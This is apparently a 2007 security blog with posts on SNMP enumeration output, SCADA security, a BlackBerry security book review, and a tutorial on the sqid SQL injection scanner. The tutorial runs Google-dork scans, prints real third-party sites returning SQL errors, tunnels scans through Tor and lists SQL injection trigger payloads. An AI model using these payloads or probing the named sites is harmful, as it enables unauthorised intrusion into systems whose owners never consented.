SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.69.115.109.105.116.104 = STRING: "Esmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.70.115.109.105.116.104 = STRING: "Fsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.71.115.109.105.116.104 = STRING: "Gsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.72.115.109.105.116.104 = STRING: "Hsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.74.115.109.105.116.104 = STRING: "Jsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.75.115.109.105.116.104 = STRING: "Ksmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.76.115.109.105.116.104 = STRING: "Lsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.77.115.109.105.116.104 = STRING: "Msmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.78.115.109.105.116.104 = STRING: "Nsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.79.115.109.105.116.104 = STRING: "Osmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.80.115.109.105.116.104 = STRING: "Psmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.81.115.109.105.116.104 = STRING: "Qsmith"
SNMPv2-SMI::d.77.1.2.25.1.1.6.82.115.109.105.116.104 = STRING: "Rsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.83.115.109.105.116.104 = STRING: "Ssmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.84.115.109.105.116.104 = STRING: "Tsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.85.115.109.105.116.104 = STRING: "Usmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.86.115.109.105.116.104 = STRING: "Vsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.87.115.109.105.116.104 = STRING: "Wsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.88.115.109.105.116.104 = STRING: "Xsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.89.115.109.105.116.104 = STRING: "Ysmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.90.115.109.105.116.104 = STRING: "Zsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.99.115.109.105.116.104 = STRING: "csmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.109.101.97.110.105.101 = STRING: "meanie"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.7.108.105.110.110.101.97.103 = STRING: "linneag"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.14.84.115.73.110.116.101.114.110.101.116.85.115.101.114 = STRING: "TsInternetUser"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.15.73.85.83.82.95.86.73.67.84.73.77.45.87.50.75 = STRING: "IUSR_VICTIM-W2K"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.15.73.87.65.77.95.86.73.67.84.73.77.45.87.50.75 = STRING: "IWAM_VICTIM-W2K"
[root@localhost snmpenum]#

also works on linux but not quite as much info...

[root@localhost snmpenum]#
perl snmpenum.pl 192.168.38.201 public linux.txt

----------------------------------------
UPTIME
----------------------------------------
17 days, 19:00:39.53

----------------------------------------
RUNNING PROCESSES
----------------------------------------
ERROR: No response from remote host '192.168.38.201'

----------------------------------------
MOUNTPOINTS
---------------------------------------
/
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers

----------------------------------------
RUNNING SOFTWARE PATHS
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush

----------------------------------------
HOSTNAME
----------------------------------------
redhat.lso.com

----------------------------------------
LISTENING UDP PORTS
----------------------------------------
111
137
138
161
721
32768

----------------------------------------
SYSTEM INFO
----------------------------------------
Linux redhat.lso.com 2.4.20-8 #1 Sat Jul 21 17:54:28 EST 2003 i686

----------------------------------------
LISTENING TCP PORTS
----------------------------------------
21
22
25
80
111
139
143
199
443

LINKS

MS Technet "How SNMP works"

CG

Thursday, July 19, 2007

Live Free or Die Hard & SCADA Security


Live Free or Die Hard

Ok while talking about movies is not totally security stuff, there was a bunch of SCADA hacking going on in the movie that was entertaining. I thought the movie was good, except for one part where the kid pulls out what looks like the PIN cracker from the terminator movie and it cracks the PIN for a door protecting these NSA servers. I don’t want to say that the rest of the movie was “believable” but the hand waving and magic at that point kinda disappointed me because they did such a good job with the rest of the flick, ok well.

There were some rumors going around that there would be some metasploit action in the movie but there wasn’t. Kinda disappointing in that respect, that would have been almost as exciting as the SSH attack in the matrix.


more on the SCADA stuff, there has been a lot of talk for years about SCADA vulnerabilities, hell you can even get a class on it by InfoSec Institute. Obviously the issues rises when you have a system that runs on, really any OS, that requires internet access yet you cant patch the box. DoD has systems like this that run some special application that if you patch the box it breaks the application or you’ll have crap that only runs on windows 98 or Windows 2000 SP0 and no one wants to pay to have someone redevelop the application and instead would rather get the whole network, VLAN (hopefully), or segment owned. For the life of me I cant imagine what guy accepted an application that runs on a computer that could never be updated but I am sure they had their reasons (ignorance, bribes, etc) but I think that time and money would be better spent developing a web solution that can do the same thing. That way you have to worry about keeping secure the ONE server, application, database, etc instead of the multitude of computers spread across the world.

Anyway, I’ll go on the limb and say that ‘security by obscurity” has been proven ineffective and we should definitely move away from that especially when (national) infrastructure is involved.


LINKS

SCADA Security and Terrorism: We're Not Crying Wolf:
http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf

SCADA system makers pushed toward security:
http://www.securityfocus.com/news/11402

Utility hack led to security overhaul:
http://www.computerworld.com/securitytopics/security/story/0,10801,108735,00.html

Hacking SCADA/SAS Systems:
http://www.ptil.no/NR/rdonlyres/F09CB606-7DEC-4062-B5FE-83D1D8D1E63A/12230/MicrosoftPowerPoint4HackingSCADAPTIL.pdf

eEye Marc Maiffret Congress Testimony
http://research.eeye.com/html/papers/download/Maiffret-Congress-Infrastructure.pdf

https://www.pcsforum.org/events/2007/atlanta/legacy.pdf

Information Technology (IT) Security for Supervisory Control and Data Acquisition (SCADA) Systems:
http://cipp.gmu.edu/archive/127_DallasGunnerson_SCADA.pdf

A Plan for SCADA Security:
http://www.itoc.usma.edu/Workshop/2005/Papers/Follow%20ups/WP%20IEEE%20(Jun%202005)%20-%20Next%20Gen%20SCADA%20Security.pdf
CG

Tuesday, July 17, 2007

Blackjacking Book Review



Blackjacking: Security Threats to BlackBerry Devices, PDAs, and Cell Phones in the Enterprise
By Daniel V Hoffman

Blackjacking takes on the task of educating both administrators and management about the threats of mobile devices to their enterprise. I believe this book succeeds in its task and serves as a great reference not only for the blackberry enterprise server (BES) administrators out there but also for the network administrators, help desk personnel, security personnel as well as a book that can aid in the education of the end users. It is written in a tone and dialog that can be useful to the technical reader and non-technical reader and does well digging into the relatively new field of mobile device (especially BlackBerry) security.

The book starts out with a very good overview of the threats to mobile devices (Malware, Direct Attack, Data Communication Interception, Spoofing and Sniffing, and Physical Compromise). It then moves into an excellent overview of the devices that will be covered in the book (BlackBerrys, Pocket PCs, Palm Handhelds, and Cell Phones).
From there each device is covered in depth with “Exploiting the Device”, “Hacking the Supporting Device Infrastructure”, and “Protecting your PC and LAN from the Device.”

The BlackBerry section (which is probably why you are thinking about purchasing the book) does a great job covering the current and future attacks given the fairly limited publicly available research, tools, and code and gives solid advice on setting up your network infrastructure to deal with the growing threat with mobile devices. The vignettes discussing plausible attacks for each attack scenario serve as good feasible examples to think about for your enterprise and users and how to protect your network.

Likes: Discussion of how BlackBerry communications work with your cell phone provider and within a BlackBerry Enterprise Server environment, all the background material on the BlackBerry device, multiple examples (for further research on what is best for your environment) for AV and firewall solutions for each type of device, and seeing attacks on most of the threats in the lab using available tools.

Dislikes: while not in the scope of the book more code examples would be nice (of course it would take away from the usability of the book to “non-technical” people) and the book didn’t list links for the tools and malware discussed (yes I know Google exists).

Overall an excellent book. I purchased the book for my BlackBerry admin (but I read it first ☺) and I think he will find it useful since he is not a “security” guy. It really ties together networking best practices and technologies and while not a “BlackBerry (or mobile device) or network lockdown guide” blackjacking serves as a good reference for further research into AV, firewalls, and VPNs for mobile devices as well as safe methods for allowing those devices entry and access into your network.

Links
DISA SECURITY TECHNICAL IMPLEMENTATION GUIDE (STIG) for BlackBerry Devices
http://iase.disa.mil/stigs/checklist/Wireless_STIG_BlackBerry_Checklist_V5R1_2.doc

Good Post on Security Basics
http://seclists.org/basics/2005/Apr/0254.html


Technical White Paper BlackBerry™ Security
www.blackberry.net/support/pdfs/bb_security_technical_wp_exchange_21.pdf




CG

Saturday, July 14, 2007

Using sqid (SQL Injection Digger) to look for SQL Injection


SQL injection digger is a command line program that looks for SQL injections and common errors in websites.
It can perform the following operations:
  • Look for SQL injection in a webpage, by looking for links.
  • Submit forms in a webpage to look for SQL injection.
  • Crawl a website to perform the above listed operations.
  • Perform a google search for a query and look for SQL injections in the urls found.
http://sqid.rubyforge.org/

Let's see it in action

sqid run with the help (-h) argument:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

Usage: sqid.rb [options]

options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.

Google search mode options:

-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.

URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.

Page check mode options:

-p, --page PAGE Check this page.

Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80

URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.

-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.

Common options:

-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.

Lines starting with a # are ignored.

-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.

-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy
PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.

-v, --verbose Run verbosely.
-h, --help Show this message


Let's play with the google query:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.

500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr&section=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='&section=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='

[*] Checked 44 URLs.


closer look at the query; sqid.rb -m g -q inurl:page.asp -s 0 -r 50

-q query = "inurl:page.asp"
-s start with result 0
-r return 50 results

You can use sqid to check a URL:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org


[*] Going to check 1 urls.


500 MS-SQL Server error => http://www.site.info/page.asp?page='


[*] Checked 1 URLs.


You can use sqid to check a page:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting links from page http://www.site.info/.

[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za

[+] Done got 2 links.

[*] Going to check 2 urls.

500 MS-SQL Server error => http://www.site.info/page.asp?page='

[*] Checked 2 URLs.

You can use sqid to crawl a site as well:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.

[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.

[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.

[*] Checked 32 URLs.

Tunnel that stuff through TOR:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---

by default, sqid will only check for SQL injection with " ' " you can add your own trigger file if you want.

adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--


SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 20 links from search inurl:login.asp starting from 0.

[+] Done got 20 links.

[*] Going to check 20 urls.


500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

----snip

-CG
CG